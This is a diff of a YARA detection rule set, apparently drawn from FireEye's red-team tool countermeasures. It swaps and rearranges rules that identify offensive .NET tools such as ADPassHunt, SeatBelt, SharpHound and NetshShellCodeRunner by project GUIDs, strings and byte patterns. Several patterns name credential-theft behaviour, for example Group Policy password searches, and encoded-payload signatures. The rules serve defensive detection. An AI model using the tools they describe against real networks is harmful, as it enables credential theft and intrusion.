-rule FIREEYE_RT_Builder_MSIL_Sinfuloffice_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SinfulOffice' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public ADPassHunt project."
 		author = "FireEye"
-		id = "cf020fb3-751b-5346-8c0d-dc0a552599a3"
+		id = "35fb8032-c73a-549f-9bd9-409f7050bdb0"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/production/yara/Builder_MSIL_SinfulOffice_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "b5d49a8720e4daa21e95ec66299daec42e65906017de886ea91f7bb6bfb04c77"
-		score = 75
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "85c7c147d6bf5b7cb417ff2910a3e7ab3be5e8a3651758c07f8f0ed42b5964d8"
+		score = 50
 		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 4
 
 	strings:
-		$typelibguid0 = "9940e18f-e3c7-450f-801a-07dd534ccb9a" ascii nocase wide
+		$typelibguid = "15745B9E-A059-4AF1-A0D8-863E349CD85D" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and $typelibguid
 }
-rule FIREEYE_RT_Methodology_OLE_CHARENCODING_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_Adpasshunt_2 : FILE
 {
 	meta:
-		description = "Looking for suspicious char encoding"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "7abd1a11-7a55-50ac-aa6b-537e7c59a5ab"
-		date = "2020-12-08"
+		id = "a3b12fd7-e82d-5ef0-9125-7c069cd9bec4"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/supplemental/yara/Methodology_OLE_CHARENCODING_2.yar#L4-L23"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/APT_HackTool_MSIL_ADPassHunt_2.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "41b70737fa8dda75d5e95c82699c2e9b"
-		logic_hash = "20843295531dfd88934fe0902a5101c5c0828e82df3289d7f263f16df9c92324"
-		score = 65
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "e2dc7db1860eef04a569f007c32abd507dd588d1392613efbb31f42ca66ff735"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$echo1 = "101;99;104;111;32;111;102;102;" ascii wide
-		$echo2 = "101:99:104:111:32:111:102:102:" ascii wide
-		$echo3 = "101x99x104x111x32x111x102x102x" ascii wide
-		$pe1 = "77;90;144;" ascii wide
-		$pe2 = "77:90:144:" ascii wide
-		$pe3 = "77x90x144x" ascii wide
-		$pk1 = "80;75;3;4;" ascii wide
-		$pk2 = "80:75:3:4:" ascii wide
-		$pk3 = "80x75x3x4x" ascii wide
+		$s1 = "LDAP://" wide
+		$s2 = "[GPP] Searching for passwords now..." wide
+		$s3 = "Searching Group Policy Preferences (Get-GPPPasswords + Get-GPPAutologons)!" wide
+		$s4 = "possibilities so far)..." wide
+		$s5 = "\\groups.xml" wide
+		$s6 = "Found interesting file:" wide
+		$s7 = "\x00GetDirectories\x00"
+		$s8 = "\x00DirectoryInfo\x00"
 
 	condition:
-		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 10MB and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPWEBCRAWLER_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Adpasshunt_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpwebcrawler' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "29b2a410-bcc4-58df-b192-7a413b3db1c0"
+		id = "b6103e23-8d1c-5d01-b283-f4545ccb924e"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPWEBCRAWLER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ADPASSHUNT/production/yara/CredTheft_MSIL_ADPassHunt_2.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "8df328663a813ca0a6864ae0503cbc1b03cfdf839215b9b4f2bb7962adf09bf8"
-		score = 75
-		quality = 73
+		hash = "6efb58cf54d1bb45c057efcfbbd68a93"
+		logic_hash = "e7282905a8baeaeb8ec156171fbf2bc4ac811facb80959a88394f4938a145cc1"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "cf27abf4-ef35-46cd-8d0c-756630c686f1" ascii nocase wide
+		$pdb1 = "\\ADPassHunt\\"
+		$pdb2 = "\\ADPassHunt.pdb"
+		$s1 = "Usage: .\\ADPassHunt.exe"
+		$s2 = "[ADA] Searching for accounts with msSFU30Password attribute"
+		$s3 = "[ADA] Searching for accounts with userpassword attribute"
+		$s4 = "[GPP] Searching for passwords now"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( ( @pdb2 [ 1 ] < @pdb1 [ 1 ] + 50 ) or 2 of ( $s* ) )
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPTEMPLATE_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharptemplate' project."
+		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
 		author = "FireEye"
-		id = "0ca9a13c-e0a0-588b-be13-5954b17d95b1"
+		id = "46477f87-2458-5b8e-894a-9aa536a441ad"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPTEMPLATE_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_1.yar#L4-L25"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "9746c1ab7b945d311c53fbdf95993d255369e06b23a3279c9f2e8a4df73ab63c"
+		hash = "848837b83865f3854801be1f25cb9f4d"
+		logic_hash = "4248e5561ef60e725c23efc89c899d6fc8be5bf2142f700fb70daecd72c30dd8"
 		score = 75
-		quality = 73
+		quality = 30
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "e9e452d4-9e58-44ff-ba2d-01b158dda9bb" ascii nocase wide
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
+		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
+		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
+		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
+		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
+		$str6 = "*[System/EventID={0}]" ascii nocase wide
+		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
+		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
+		$str9 = "{0}" ascii nocase wide
+		$str10 = "{0,-23}" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPGOPHER_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpgopher' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SeatBelt project."
 		author = "FireEye"
-		id = "cc8eb9cd-9a51-5fab-b0a4-247baaa69dd7"
+		id = "225b42fe-c73a-59c0-a1f4-1d6dff6e76e1"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPGOPHER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_2.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "ac37f77440cb76d7dafa4c9b4130471ca6ca760f6d72691db9ebb8cbaaad0c58"
+		hash = "9f401176a9dd18fa2b5b90b4a2aa1356"
+		logic_hash = "e48474c5025fd88e3c2824e1e943ff56cde0ea05984aad0249ccf73caa6d4a36"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "83413a89-7f5f-4c3f-805d-f4692bc60173" ascii nocase wide
+		$typelibguid1 = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSQLCLIENT_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Puppyhound_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsqlclient' project."
+		description = "This is a modification of an existing FireEye detection for SharpHound. However, it looks for the string 'PuppyHound' instead of 'SharpHound' as this is all that was needed to detect the PuppyHound variant of SharpHound."
 		author = "FireEye"
-		id = "4d526c36-f56f-53cf-9bdf-b7a15619eb41"
+		id = "1155f959-c8bc-597a-8a80-abee8d95b6ec"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPSQLCLIENT_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_PuppyHound_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "bc79f80582f4fadecf54d926abdcf61694224654ba5075203f0d1123cf11afc1"
+		hash = "eeedc09570324767a3de8205f66a5295"
+		logic_hash = "39073bbfef15ecd28c1772e5d01e54c3d5774ecb4c90f0076bda5dc400abacba"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 6
 
 	strings:
-		$typelibguid0 = "13ed03cd-7430-410d-a069-cf377165fbfd" ascii nocase wide
+		$1 = "PuppyHound"
+		$2 = "UserDomainKey"
+		$3 = "LdapBuilder"
+		$init = { 28 [2] 00 0A 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 28 [2] 00 0A 0B 1F 2D }
+		$msil = /\x00_Cor(Exe|Dll)Main\x00/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDACL_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharphound_3 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdacl' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project."
 		author = "FireEye"
-		id = "13f4e3ea-1e36-5fad-9197-66511d6f026a"
+		id = "456b3208-1e8d-5eb7-81ee-39f1c886c5a7"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDACL_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_SharpHound_3.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "5f44ec5ddded18fb3a9132b469b2fe7ccbffb3f907325485f0f72fe3d6bbfa23"
+		hash = "eeedc09570324767a3de8205f66a5295"
+		logic_hash = "baeea6cae42c755ee389378229b2b206c82f60f75a5ce5f9cfa06871fc9507d1"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 4
 
 	strings:
-		$typelibguid0 = "b3c17fb5-5d5a-4b14-af3c-87a9aa941457" ascii nocase wide
+		$typelibguid1 = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii nocase wide
 
 	condition:
-		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Credtheft_MSIL_Wcmdump_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Allthethings_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WCMDump' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'AllTheThings' project."
 		author = "FireEye"
-		id = "22796ccb-a01e-59d8-8c3a-6cbb62899940"
+		id = "1805b406-2531-56bf-8e08-e63a59ffcc84"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_WCMDump_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/ALLTHETHINGS/production/yara/Loader_MSIL_AllTheThings_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "9fbf53e551342695b306b10f30a3fe32dff359bd70e84e1fa1f190772f5dcbe3"
+		logic_hash = "e3058095f2a49f8c0f78cb392024795367609b04c1da80210ab8d72c6613ee71"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 1
-
-	strings:
-		$typelibguid0 = "21e322f2-4586-4aeb-b1ed-d240e2a79e19" ascii nocase wide
-
-	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
-}
-rule FIREEYE_RT_APT_Hacktool_MSIL_REDTEAMMATERIALS_1 : FILE
-{
-	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'red_team_materials' project."
-		author = "FireEye"
-		id = "272cd3e9-884a-566b-ae90-4a79ee726a8d"
-		date = "2020-12-08"
-		modified = "2020-12-09"
-		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_REDTEAMMATERIALS_1.yar#L4-L16"
-		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "ca54a1e8335c4256295fc643f5d31eae2e89f020dc7a9b571c4772edaad08022"
-		score = 75
-		quality = 71
-		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$typelibguid0 = "86c95a99-a2d6-4ebe-ad5f-9885b06eab12" ascii nocase wide
-		$typelibguid1 = "e06f1411-c7f8-4538-bbb9-46c928732245" ascii nocase wide
+		$typelibguid0 = "542ccc64-c4c3-4c03-abcd-199a11b26754" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNATIVEZIPPER_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpschtask_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnativezipper' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpSchtask' project."
 		author = "FireEye"
-		id = "c48835a7-06fe-5b30-be4d-086d98dc7a21"
+		id = "5c7a5dee-3bc2-54b2-a7e2-be05ba74d4a1"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNATIVEZIPPER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSCHTASK/production/yara/HackTool_MSIL_SharpSchtask_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "fa54375b21abbb613e695f70a15233575fbe6e0536716544bb3b527f5e3ed8c6"
+		logic_hash = "7437fde82920f4d015a7f149b58924baf6cb220c6f6857d9509e23795ff0811c"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid0 = "de5536db-9a35-4e06-bc75-128713ea6d27" ascii nocase wide
+		$typelibguid0 = "0a64a5f4-bdb6-443c-bdc7-f6f0bf5b5d6c" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDNS_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Netshshellcoderunner_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdns' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NetshShellCodeRunner' project."
 		author = "FireEye"
-		id = "db6b45be-f42f-5d0f-b50a-32e7a2cbfce6"
+		id = "b3521812-7ea3-5f80-89bd-3bdd71b687f2"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDNS_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETSHSHELLCODERUNNER/production/yara/Loader_MSIL_NetshShellCodeRunner_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "bab36f9b1532c3b24c2aea2907006820ed7cf1c90dae7a8138962e14ac9eff55"
+		logic_hash = "97f6475a9d42697f633e06a9b04a85021ca4920145eb4af257d71b431448f0e9"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$typelibguid0 = "d888cec8-7562-40e9-9c76-2bb9e43bb634" ascii nocase wide
+		$typelibguid0 = "49c045bc-59bb-4a00-85c3-4beb59b2ee12" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_MODIFIEDSHARPVIEW_1 : FILE
+rule FIREEYE_RT_Builder_MSIL_Sinfuloffice_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'modifiedsharpview' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SinfulOffice' project."
 		author = "FireEye"
-		id = "e07d3d4b-fba3-5df7-85f4-927bb8cec2d1"
+		id = "cf020fb3-751b-5346-8c0d-dc0a552599a3"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_MODIFIEDSHARPVIEW_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/production/yara/Builder_MSIL_SinfulOffice_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "db0eaad52465d5a2b86fdd6a6aa869a5"
-		logic_hash = "a47c48da998243fab92665649fb9d6ecc6ac32e1fd884c2c0d5ccecb05290c10"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "b5d49a8720e4daa21e95ec66299daec42e65906017de886ea91f7bb6bfb04c77"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid0 = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii nocase wide
+		$typelibguid0 = "9940e18f-e3c7-450f-801a-07dd534ccb9a" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_DNSOVERHTTPS_C2_1 : FILE
+rule FIREEYE_RT_Methodology_OLE_CHARENCODING_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'DoHC2' External C2 project."
+		description = "Looking for suspicious char encoding"
 		author = "FireEye"
-		id = "ee71be6c-e3c8-5365-9f32-157f00066c49"
+		id = "7abd1a11-7a55-50ac-aa6b-537e7c59a5ab"
 		date = "2020-12-08"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_DNSOVERHTTPS_C2_1.yar#L4-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/supplemental/yara/Methodology_OLE_CHARENCODING_2.yar#L4-L23"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "a482161bbd8e249977f28466ff1381d4693495f8b8ccd9183ae4fde1ec1471eb"
-		score = 75
-		quality = 71
+		hash = "41b70737fa8dda75d5e95c82699c2e9b"
+		logic_hash = "20843295531dfd88934fe0902a5101c5c0828e82df3289d7f263f16df9c92324"
+		score = 65
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 4
 
 	strings:
-		$typelibguid0 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide
-		$typelibguid1 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide
+		$echo1 = "101;99;104;111;32;111;102;102;" ascii wide
+		$echo2 = "101:99:104:111:32:111:102:102:" ascii wide
+		$echo3 = "101x99x104x111x32x111x102x102x" ascii wide
+		$pe1 = "77;90;144;" ascii wide
+		$pe2 = "77:90:144:" ascii wide
+		$pe3 = "77x90x144x" ascii wide
+		$pk1 = "80;75;3;4;" ascii wide
